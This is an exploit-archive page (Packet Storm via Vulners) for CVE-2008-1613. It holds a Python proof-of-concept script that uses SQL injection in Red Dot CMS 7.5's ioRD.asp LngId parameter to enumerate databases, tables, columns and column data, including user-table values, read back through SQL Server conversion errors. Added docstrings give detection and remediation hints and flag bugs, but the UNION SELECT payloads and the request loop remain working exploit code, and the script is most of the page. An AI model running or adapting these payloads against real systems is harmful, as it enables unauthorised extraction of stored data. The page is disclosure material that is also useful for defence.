
RDdbenum.py.txt

21 Apr 2008 00:00:00 | Reported by Rodrigo Marcos | Type: packetstorm | packetstormsecurity.com | 30 Views

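This Python script is a proof of concept that enumerates database information in Red Dot CMS 7.5: databases, tables, columns, and column data. It works through SQL injection in the `LngId` parameter of `ioRD.asp` (the Related list on this page gives CVE-2008-1613 for the RedDot CMS SQL injection) and reads values back from the conversion-error text the application returns. Options select the database, table, and column to enumerate.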


Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2008-1613
22 Apr 200804:41
โ€“cve
securityvulns
[Full-disclosure] IRM Security Advisory : RedDot CMS SQL injection vulnerability
21 Apr 200800:00
โ€“securityvulns
securityvulns
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
21 Apr 200800:00
โ€“securityvulns
seebug.org
RedDot CMS ioRD.aspๆ–‡ไปถSQLๆณจๅ…ฅๆผๆดž
24 Apr 200800:00
โ€“seebug
Cvelist
CVE-2008-1613
21 Apr 200820:00
โ€“cvelist
Packet Storm
reddot-sql.txt
21 Apr 200800:00
โ€“packetstorm
Prion
Sql injection
22 Apr 200804:41
โ€“prion
NVD
CVE-2008-1613
22 Apr 200804:41
โ€“nvd
`#!/usr/bin/env python  
  
# un-comment your selection.  
  
import urllib2  
import urllib  
import string  
import getopt  
import sys  
  
def banner():
    """Print a blank line followed by the tool title and author credit."""
    for line in ("",
                 "RED DOT CMS 7.5 database enumeration",
                 "by Mark Crowther and Rodrigo Marcos"):
        print line
  
def usage():
    """Print the command-line help text, then end the script with sys.exit()."""
    help_lines = [
        "",
        "usage():",
        "python RD_POC.py [options] URL",
        "",
        " [options]",
        " --dbenum: Database enumeration",
        " --tableenum: Table enumeration, use -d to specify database",
        " --colenum: Column enumeration, use -d to specify database and -t to specify table",
        " --dataenum: Data enumeration, use -d to specify database, -t to specify table and -c to specify a column",
        " -d: Specify a database",
        " -t: Specify a table",
        " -c: Specify a column",
        " -h: Help page",
        "",
        "Examples: ",
        " python RD_POC.py --dbenum http://myhost/cms/",
        " python RD_POC.py --tableenum -d IoAdministration http://myhost/cms/",
        " python RD_POC.py --colenum -d IoAdministration -t IO_USR http://myhost/cms/",
        " python RD_POC.py --dataenum -d IoAdministration -t IO_USR -c USR2 http://myhost/cms/",
        "",
    ]
    # One write instead of one print statement per line; the emitted text is the same.
    print "\n".join(help_lines)
    sys.exit()
  
def retrievedata(url1, url2 = "' ORDER BY 1;-- &DisableAutoLogin=1"):
    """Request url1 + <last value> + url2 in a loop and print each value found.

    url1 is the request prefix built by the *enum helpers (it ends inside an
    open single-quoted literal); url2 closes that literal and comments out the
    rest of the statement. Each response is searched for a conversion-error
    marker; when it is present, the text between the first two single quotes
    in the response is printed and used as the lower bound for the next
    request. The loop ends on the first response without the marker.

    Defender notes:
      * The read-back channel is the error text in the HTTP response. The
        marker looks like a SQL Server type-conversion error (TODO confirm
        against the affected product); returning a generic error page removes
        this channel but not the injection itself. The fix is for the
        application to treat LngId as data (parameterised query / strict
        allow-list of language ids).
      * In web logs this appears as a run of near-identical GET requests to
        ioRD.asp from one client, each with SQL keywords (UNION SELECT,
        ORDER BY, "--") inside the LngId value and spaces encoded as %20.
    """
    stop = 0

    # Last value extracted from a response; empty on the first request.
    current = ''

    while (stop==0):

        request = url1 + current + url2

        # Only spaces are percent-encoded; every other character is sent as-is.
        request = string.replace(request, ' ', '%20')
        req = urllib2.Request(request)
        try:
            r = urllib2.urlopen(req)
        except urllib2.URLError, msg:
            print "[+] Error: Error requesting URL (%s)" % msg
        # NOTE(review): after a failed urlopen() execution still reaches this
        # line, so r is unbound on the first iteration (NameError) or stale on
        # later ones.
        result = r.read()

        #print result
        # No conversion-error marker in the body: nothing further to read, stop.
        if string.find(result, ' Description Conversion failed when converting the ') == -1:
            stop = 1
        else:
            # Take the text between the first and second single quote of the
            # whole response body as the next value.
            start = string.find(result, "'") + 1
            end = string.find(result[start:], "'") + start
            current = result[start:end]
            print current
  
  
def dbenum():
    """List database names by passing a SYS.SYSDATABASES query prefix to retrievedata().

    Reads the module-level name `url`, which the script body sets from the
    last command-line argument. The injected text is carried in the LngId
    parameter of ioRD.asp.

    Detection: an LngId value containing "FROM IO_DGC_ENG UNION SELECT" and a
    reference to SYSDATABASES is not a legitimate language id and can be
    matched in request logs or by a WAF rule.
    """

    retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYS.SYSDATABASES where name> '")
  
def tableenum(database=''):
    """List table names from SYSOBJECTS, optionally qualified with `database`.

    With an empty `database` the query reads SYSOBJECTS unqualified;
    otherwise it reads <database>..SYSOBJECTS. `database` comes straight from
    the -d option and is concatenated into the request without validation.
    char(85) is the character 'U'; as an xtype filter that presumably selects
    user tables (TODO confirm against the target DBMS documentation).

    Detection: LngId values that reference SYSOBJECTS.
    """

    if database=='':
        retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '")

    else:
        retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM " + database + "..SYSOBJECTS where xtype=char(85) and name> '")
  
def colenum(table, database=''):
    """List column names of `table` from SYSCOLUMNS, optionally qualified with `database`.

    An empty `table` prints the help text and exits through usage(). Here the
    second argument to retrievedata() replaces its default suffix: it adds a
    sub-select on SYSOBJECTS that restricts the result to the named table,
    then the same "ORDER BY 1;--" terminator. `table` and `database` are
    concatenated into the request without validation.

    Detection: LngId values that reference SYSCOLUMNS / SYSOBJECTS.
    """

    if table=='':
        usage()

    if database=='':
        retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSCOLUMNS where name > '", "' AND id = (SELECT id from SYSOBJECTS WHERE name= '" + table + "') ORDER BY 1;-- &DisableAutoLogin=1")
    else:
        retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM " + database + "..SYSCOLUMNS where name > '","' AND id = (SELECT id from " + database + "..SYSOBJECTS WHERE name= '" + table + "') ORDER BY 1;-- &DisableAutoLogin=1")
  
  
def dataenum(column, table, database=''):
    """List the values of `column` in `table`, optionally qualified with `database`.

    An empty `column` or `table` prints the help text and exits through
    usage(). The query selects MIN(column) above the previously returned
    value, so retrievedata() walks the column in ascending order. All three
    arguments are concatenated into the request without validation.

    Impact for defenders: the usage examples on this page show this mode
    against IoAdministration / IO_USR / USR2, so any column the CMS database
    account can read should be treated as exposed on an unpatched
    installation.
    """

    if column=='' or table=='':
        usage()

    if database=='':
        retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT MIN(" + column + ") FROM " + table + " WHERE " + column + "> '")

    else:
        retrievedata(url + "/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT MIN(" + column + ") FROM " + database + ".." + table + " WHERE " + column + "> '")
  
  
# Script body: print the banner, parse the command line, run one enumeration mode.
banner()
# Mode flags (0/1), set by the long options below.
pdbenum = 0
ptableenum = 0
pcolenum = 0
pdataenum = 0
# Values of -d / -t / -c; an empty string means "not given".
database = ''
table = ''
column = ''

# The target base URL is whatever the last command-line argument is; it is not
# validated, and with no arguments this is the script name itself.
url = sys.argv[len(sys.argv)-1]

try:
    # NOTE(review): "h:" makes -h require an argument, although the help text
    # lists it as a plain flag.
    opts, args = getopt.getopt(sys.argv[1:], "d:t:c:h:", ["help", "dbenum", "tableenum", "colenum", "dataenum"])
except getopt.GetoptError:
    usage()

try:
    for o, a in opts:
        if o in ("-h", "--help"):
            usage()
        if o == "--dbenum":
            pdbenum = 1
        if o == "--tableenum":
            ptableenum = 1
        if o == "--colenum":
            pcolenum = 1
        if o == "--dataenum":
            pdataenum = 1
        if o == "-d":
            database = a
        if o == "-t":
            table = a
        if o == "-c":
            column = a
except:
    # NOTE(review): a bare except also catches the SystemExit raised by
    # usage() inside the loop, so the help text is printed a second time.
    usage()


# Exactly one mode runs; if several mode flags were given, the first match in
# this order wins. With no mode flag the help text is shown.
if pdbenum == 1:
    print 'Enumerating databases:'
    dbenum()
elif ptableenum == 1:
    print 'Enumerating tables:'
    tableenum(database)
elif pcolenum == 1:
    print 'Enumerating columns:'
    colenum(table, database)
elif pdataenum == 1:
    print 'Enumerating data:'
    dataenum(column, table, database)
else:
    usage()
  
  
  
  
  
  
  
  
  
  
  
  
  
  
`

21 Apr 2008 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.00905